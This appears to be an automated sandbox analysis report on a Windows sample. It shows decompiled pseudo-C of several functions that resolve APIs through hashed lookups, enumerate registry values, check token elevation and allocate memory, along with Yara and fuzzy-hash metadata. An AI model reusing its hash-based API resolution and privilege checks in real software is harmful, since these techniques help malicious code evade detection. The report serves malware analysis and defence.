Function 6F4C5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6F4C5E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6F4BC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6F4C3064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6f4c5e14
0x6f4c5e15
0x6f4c5e17
0x6f4c5e1d
0x6f4c5e1f
0x6f4c5e23
0x6f4c5e23
0x6f4c5e27
0x6f4c5e33
0x6f4c5e67
0x6f4c5e67
0x00000000
0x6f4c5e35
0x6f4c5e3a
0x6f4c5e3b
0x6f4c5e4f
0x6f4c5e60
0x6f4c5e51
0x6f4c5e5c
0x6f4c5e5c
0x6f4c5e65
0x6f4c5e6d
0x6f4c5e6f
0x6f4c5e72
0x6f4c5e77
0x6f4c5e77
0x6f4c5e7b
0x6f4c5e80
0x00000000
0x00000000
0x00000000
0x6f4c5e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6F4C5D48,?,?), ref: 6F4C5E5C

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 559587d29476f036a4ae77993fba682dd1552e8becd0e31676132e3238966a31
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 6DF0F935A08B1479D7115B3D9D40F9F73E9DF91790F145B2EF540A6284EA70A440C2A2

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F4C564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6F4C3064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6F4BE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6f4c5656
0x6f4c5658
0x6f4c565f
0x6f4c5661
0x6f4c5665
0x6f4c5667
0x6f4c566a
0x6f4c566d
0x6f4c566d
0x6f4c5687
0x00000000
0x00000000
0x6f4c5698
0x6f4c569c
0x00000000
0x00000000
0x6f4c56aa
0x6f4c56ad
0x6f4c56b2
0x6f4c56b7
0x6f4c56b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6F4C5698

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: adec8e450bfaad95a3b5651778e90527dbbf51aea63072f0a06af99b1165ea47
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: FBF0C8B5200309ABE7249E1ECC44DBBBBFDDBC1B50F00852DA4D542740EA31AC50C9B1

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F4C1030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6F4C306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6f4c103e
0x6f4c1040
0x6f4c104e
0x6f4c1052
0x6f4c109b
0x00000000
0x6f4c109b
0x6f4c1057
0x6f4c1058
0x6f4c105a
0x6f4c105f
0x00000000
0x6f4c1078
0x6f4c107c
0x6f4c1089
0x6f4c108d
0x00000000
0x00000000
0x00000000
0x6f4c1096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6F4C1089

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: bc4fea97eda5ecef11b2afd7def1204ca21656e4689cff351c06d1975832f017
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 3AF0C278354643ABFA00D5799C25F7F32FD5BC1610F418839BA40CAA94EF38D8058223

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6F4C3628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6f4cd228 == 0xa33c83e5) {
					_t7 = E6F4C3064(0x60a28c5c, 0x1c6ef387);
					 *0x6f4cd22c = E6F4C3064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6f4cd228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6f4cd228 = 0;
					}
				}
				_t3 = E6F4C3064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6f4cd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6f4c3630
0x6f4c3638
0x6f4c366b
0x6f4c367c
0x6f4c3687
0x6f4c3692
0x6f4c3694
0x6f4c3694
0x6f4c3687
0x6f4c3644
0x6f4c364b
0x00000000
0x6f4c364d
0x6f4c364d
0x6f4c364e
0x6f4c3650
0x6f4c3652
0x6f4c3653
0x00000000
0x6f4c3653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6F4BDE09,?,?), ref: 6F4C3692

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 2e1e7528c6ba17b00ef74035e8e0e885993ee88e004aefe004748af3c642d353
Instruction ID: 3368a32d80aa3c816e7df4b61c3c44a23bac6681bbca63637fd5b54064f38351
Opcode Fuzzy Hash: 2e1e7528c6ba17b00ef74035e8e0e885993ee88e004aefe004748af3c642d353
Instruction Fuzzy Hash: DDF0243C256280BDFA301976AC02E3296A4EF60255B002C39F6C0A5B40C6B48440C233

Uniqueness

Uniqueness Score: -1.00%

Function 0103129E, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 010313A5

Memory Dump Source

Source File: 00000000.00000002.749390798.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction ID: bec0d38bdd24fa0c141038d7451b9b9f90752bacb4467f217f7dea2f782daa08
Opcode Fuzzy Hash: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction Fuzzy Hash: F641D0B5E0521A9FDB04CFA9C4906AEBBF5BF88310F15856EE848AB340D375A841CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F4B1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6F4B1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6F4BF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v76, E6F4BF4CC( &_v76) + 0x10);
				E6F4BF4BC( &_v80, E6F4BF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v84, E6F4BF4CC(_t325) + 0x10);
				E6F4BF4BC( &_v88, E6F4BF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v92, E6F4BF4CC(_t329) + 0x10);
				E6F4BF4BC( &_v96, E6F4BF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v100, E6F4BF4CC(_t333) + 0x10);
				E6F4BF4BC( &_v104, E6F4BF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v108, E6F4BF4CC(_t337) + 0x10);
				E6F4BF4BC( &_v112, E6F4BF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v116, E6F4BF4CC(_t341) + 0x10);
				E6F4BF4BC( &_v120, E6F4BF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v124, E6F4BF4CC(_t345) + 0x10);
				E6F4BF4BC( &_v128, E6F4BF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v132, E6F4BF4CC(_t349) + 0x10);
				E6F4BF4BC( &_v136, E6F4BF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v140, E6F4BF4CC(_t353) + 0x10);
				E6F4BF4BC( &_v144, E6F4BF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v148, E6F4BF4CC(_t357) + 0x10);
				E6F4BF4BC( &_v152, E6F4BF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v156, E6F4BF4CC(_t361) + 0x10);
				E6F4BF4BC( &_v160, E6F4BF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v164, E6F4BF4CC(_t365) + 0x10);
				E6F4BF4BC( &_v168, E6F4BF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v172, E6F4BF4CC(_t369) + 0x10);
				E6F4BF4BC( &_v176, E6F4BF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v180, E6F4BF4CC(_t373) + 0x10);
				E6F4BF4BC( &_v184, E6F4BF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v188, E6F4BF4CC(_t377) + 0x10);
				E6F4BF4BC( &_v192, E6F4BF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v196, E6F4BF4CC(_t381) + 0x10);
				E6F4BF4BC( &_v200, E6F4BF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v204, E6F4BF4CC(_t385) + 0x10);
				E6F4BF4BC( &_v208, E6F4BF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6F4C4200(0x60a28c5c, _t434);
				E6F4BF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6F4BF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6F4BF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6F4BF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6F4BF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6F4BF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6F4BF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6F4BF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6F4BF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6F4BF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6F4BF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6F4BF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6F4BF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6F4BF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6F4BF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6F4BF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6F4BF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6F4B1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6F4BB27C( &_v248, _v256, _t481, _v252, _t318);
				E6F4BF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v296, E6F4BF4CC(_t410) + 0x10);
				E6F4BF4BC( &_v300, E6F4BF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v304, E6F4BF4CC(_t414) + 0x10);
				E6F4BF4BC( &_v308, E6F4BF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v312, E6F4BF4CC(_t418) + 0x10);
				E6F4BF4BC( &_v316, E6F4BF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6F4BF828( &_v320, E6F4BF4CC(_t422) + 0x10);
				E6F4BF4BC( &_v324, E6F4BF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6F4BB9FC(_t154,  *_t480);
				E6F4BF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6F4BF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6F4BF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6F4BF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6F4BF654( &_v316);
				return E6F4BF654( &_v356);
			}

0x6f4b1494
0x6f4b1498
0x6f4b149d
0x6f4b14a3
0x6f4b14ab
0x6f4b14b0
0x6f4b14bc
0x6f4b14c0
0x6f4b14d2
0x6f4b14e8
0x6f4b14f3
0x6f4b14f4
0x6f4b14f5
0x6f4b14f6
0x6f4b14f7
0x6f4b14fa
0x6f4b14fe
0x6f4b1502
0x6f4b1509
0x6f4b151b
0x6f4b1531
0x6f4b153c
0x6f4b153d
0x6f4b153e
0x6f4b153f
0x6f4b1540
0x6f4b1543
0x6f4b1547
0x6f4b154b
0x6f4b1552
0x6f4b1564
0x6f4b157a
0x6f4b1585
0x6f4b1586
0x6f4b1587
0x6f4b1588
0x6f4b1589
0x6f4b158c
0x6f4b1590
0x6f4b1594
0x6f4b159b
0x6f4b15ad
0x6f4b15c3
0x6f4b15ce
0x6f4b15cf
0x6f4b15d0
0x6f4b15d1
0x6f4b15d2
0x6f4b15d5
0x6f4b15d9
0x6f4b15dd
0x6f4b15e4
0x6f4b15f6
0x6f4b160c
0x6f4b1617
0x6f4b1618
0x6f4b1619
0x6f4b161a
0x6f4b161b
0x6f4b161e
0x6f4b1622
0x6f4b1626
0x6f4b162d
0x6f4b163f
0x6f4b1655
0x6f4b1660
0x6f4b1661
0x6f4b1662
0x6f4b1663
0x6f4b1664
0x6f4b1667
0x6f4b166b
0x6f4b166f
0x6f4b1676
0x6f4b1688
0x6f4b169e
0x6f4b16a9
0x6f4b16aa
0x6f4b16ab
0x6f4b16ac
0x6f4b16ad
0x6f4b16b0
0x6f4b16b4
0x6f4b16b8
0x6f4b16bf
0x6f4b16d1
0x6f4b16e7
0x6f4b16f2
0x6f4b16f3
0x6f4b16f4
0x6f4b16f5
0x6f4b16f6
0x6f4b16f9
0x6f4b16fd
0x6f4b1701
0x6f4b1708
0x6f4b171a
0x6f4b1730
0x6f4b173b
0x6f4b173c
0x6f4b173d
0x6f4b173e
0x6f4b173f
0x6f4b1742
0x6f4b1746
0x6f4b174a
0x6f4b1751
0x6f4b1763
0x6f4b1779
0x6f4b1784
0x6f4b1785
0x6f4b1786
0x6f4b1787
0x6f4b1788
0x6f4b178b
0x6f4b178f
0x6f4b1793
0x6f4b179a
0x6f4b17ac
0x6f4b17c2
0x6f4b17cd
0x6f4b17ce
0x6f4b17cf
0x6f4b17d0
0x6f4b17d1
0x6f4b17d4
0x6f4b17d8
0x6f4b17dc
0x6f4b17e3
0x6f4b17f5
0x6f4b180b
0x6f4b1816
0x6f4b1817
0x6f4b1818
0x6f4b1819
0x6f4b181a
0x6f4b181d
0x6f4b1821
0x6f4b1825
0x6f4b182c
0x6f4b183e
0x6f4b1854
0x6f4b185f
0x6f4b1860
0x6f4b1861
0x6f4b1862
0x6f4b1863
0x6f4b1866
0x6f4b186a
0x6f4b186e
0x6f4b1875
0x6f4b1887
0x6f4b189d
0x6f4b18a8
0x6f4b18a9
0x6f4b18aa
0x6f4b18ab
0x6f4b18ac
0x6f4b18af
0x6f4b18b3
0x6f4b18b7
0x6f4b18be
0x6f4b18d0
0x6f4b18e6
0x6f4b18f1
0x6f4b18f2
0x6f4b18f3
0x6f4b18f4
0x6f4b18f5
0x6f4b18f8
0x6f4b18fc
0x6f4b1900
0x6f4b1907
0x6f4b1919
0x6f4b192f
0x6f4b193a
0x6f4b193b
0x6f4b193c
0x6f4b193d
0x6f4b193e
0x6f4b1941
0x6f4b1945
0x6f4b1949
0x6f4b1950
0x6f4b1962
0x6f4b1978
0x6f4b1983
0x6f4b1984
0x6f4b1985
0x6f4b1986
0x6f4b198c
0x6f4b198f
0x6f4b1991
0x6f4b199c
0x6f4b19a3
0x6f4b19ac
0x6f4b19b4
0x6f4b19bb
0x6f4b19c4
0x6f4b19cc
0x6f4b19d3
0x6f4b19dc
0x6f4b19e4
0x6f4b19eb
0x6f4b19f4
0x6f4b19fc
0x6f4b1a03
0x6f4b1a0c
0x6f4b1a14
0x6f4b1a1b
0x6f4b1a24
0x6f4b1a2c
0x6f4b1a36
0x6f4b1a3f
0x6f4b1a47
0x6f4b1a51
0x6f4b1a5a
0x6f4b1a62
0x6f4b1a6c
0x6f4b1a75
0x6f4b1a7d
0x6f4b1a87
0x6f4b1a90
0x6f4b1a98
0x6f4b1aa2
0x6f4b1aab
0x6f4b1ab3
0x6f4b1abd
0x6f4b1ac6
0x6f4b1ace
0x6f4b1ad8
0x6f4b1ae1
0x6f4b1ae9
0x6f4b1af3
0x6f4b1afc
0x6f4b1b04
0x6f4b1b0e
0x6f4b1b17
0x6f4b1b1f
0x6f4b1b26
0x6f4b1b2f
0x6f4b1b37
0x6f4b1b3e
0x6f4b1b43
0x6f4b1b51
0x6f4b1b55
0x6f4b1b64
0x6f4b1b6d
0x6f4b1b72
0x6f4b1b79
0x6f4b1b7d
0x6f4b1b81
0x6f4b1b88
0x6f4b1b9a
0x6f4b1bb0
0x6f4b1bbb
0x6f4b1bbc
0x6f4b1bbd
0x6f4b1bbe
0x6f4b1bbf
0x6f4b1bc2
0x6f4b1bc6
0x6f4b1bca
0x6f4b1bd1
0x6f4b1be3
0x6f4b1bf9
0x6f4b1c04
